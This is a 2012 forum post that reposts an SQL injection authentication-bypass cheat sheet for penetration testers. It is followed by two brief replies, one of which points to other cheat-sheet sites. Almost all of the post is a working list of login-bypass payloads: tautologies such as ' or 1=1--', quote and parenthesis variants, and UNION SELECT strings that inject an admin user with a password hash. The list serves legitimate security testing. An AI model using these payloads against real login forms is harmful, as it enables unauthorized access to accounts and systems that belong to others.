SQL Injection Authentication Bypass Cheat Sheet

Nytro · December 25, 2012

[h=2]SQL Injection Authentication Bypass Cheat Sheet[/h]This list can be used by penetration testers when testing for SQL injection authentication bypass.A penetration tester can use it manually or through burp in order to automate the process.The creator of this list is Dr. Emin ?slam Tatl?If (OWASP Board Member).If you have any other suggestions please feel free to leave a comment in order to improve and expand the list.

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Sursa: SQL Injection Authentication Bypass Cheat Sheet

boogy · December 26, 2012

Mersi mult.

oul · December 26, 2012

Aici e un site care m-a ajutat mult. Cheat Sheets | pentestmonkey

Aveti aici niste cheat-sheet uri de la Oracle sql injection, mysql sqli, postgress sqli, db2 sqli, ingres sqli, mssql sqli, informix sqli. Si alte multe chestii interesante. Daca owneru la site e printre noi, tare as vrea sa ii fac cinste cu o bere:)

Edited December 26, 2012 by oul

Sign In

SQL Injection Authentication Bypass Cheat Sheet

Recommended Posts

Nytro

boogy

oul

Join the conversation

Browse

Activity

Pages